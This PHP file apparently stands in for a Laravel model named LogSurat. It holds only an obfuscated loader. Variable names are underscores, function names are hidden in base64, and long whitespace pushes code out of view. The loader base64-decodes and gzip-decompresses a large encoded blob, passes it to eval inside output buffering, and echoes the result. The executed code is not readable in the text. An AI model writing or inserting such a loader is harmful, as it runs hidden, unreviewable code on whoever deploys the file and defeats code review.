<?php 
        $__='printf';$_='Loading app/Models/LogSurat.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltv4jgUx98r7XfgYaR0tKtOEkpbhHggGXJrSUto48QvVWzTBMitDbfw6fcEApTdHW33otXsyL8oxHHs4+P/OTYSpNHY8ekZ6Ar52ySdvwid7W1NVwjy/MsgY+O4+HKXhaPFWzC/yKO8ocZBUVxcXAids9pM46czfnx/x1kVz8a/SPd3NYIntQsfSROs97vCtuqYFR+izrlug8PhcH5MBJq4IvOsham7so9WmaW1X7xydr3bNGHX3G3Xz1wqDofD4XA4HA7n/wb/OYPD4XB+XAQSFOOry2c2phkbCx2uCIfD4XA4/4jTFxG+DjNbTVoRQe6G6toUjxSFGgp9RO0ZRuvN/Uq8/TrMJSo/hUNPWXn9SGTw3DWsKPCcjde3lyTBORbjWdWWeXZs9uOCGO48QK2I6S51dE30kRVRGcpovaSeG5PUocPUzYnuxHRa2GrqbmBsi+hriaB44XtO7PUd6K9NfLDp9d2CNDUJo5bo9aUl1t2i9m1KdG1DS2VAZPbIPCtiqhKPDScmibMx67bQ7hrmGppqL9z5eOr3/tldmb3uy6aaha4exabhRH6yjs1qHLk9DZAmYjQMmRyLgaqIgf4Ukq1eq8W7vrY66W3LtxOlxxKtNA1bpEm8wDDerk3v9W5fNpSSNJ3YhxOrvVk1bwJ2H0a9lOjt1GvaEk000dqAVuG+/83rbXi0ZWpOBhqWEDfQLV6SdBAy/SbESEuxZ4ZgJ8KqsiQTJWaJW45Hypqh6np59PW9vb4i+9DP96zS92bv5nNTl5UVTdqghb3VwzJYzvQQfFaIJeMlTaSIabXf5Sq0mkoVEwkb7lt9D3nXXuCSsfcxoIYLc4+npo4lkthiAG2gfGLvVt37o1wfNa90tGJmuCWZVBpGOS3Fn/0EckdupVRylrf9Uzv3033+gD9yPPMOfrc3u1yi+f0hRuJRe0ORICdyv1QShlrTrd4TZQX5OWPIkYIyzPd+jY/xrvwtsefA2Jegl5MF3mD+kFgxxGaBm/YTKaPhwcYmu/LldUSbg8JUWY619ta+Vc4Oc34Z/oluxl7jv++PjyRYK/TqPrELWIubO7WXBsh5gf1iXun6LX9+u5aeZHtJIaer9U/TWQi6iQwVIdXdBZYZ+Nz/5vqBsUofieFhz4D41nZO2+3/Cu5bUoDWM8j7P8xbhqwiQIMQp+4C1lxO5MuQbv1zK/1T3IT6Ubgf4wPawd7kWa27x1Yz0N0Sj8JaI5ibSgvYOyRYG5kl580qp6Ad7KluCXk8f0iP6wLqc6ye6lmdQufs7L//kuhur+f13efOX+n+ru9HOn46DnguVJ/CL4dh+btw3/e7cKcxPD9Jml0IP3d+BYlzQrM=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
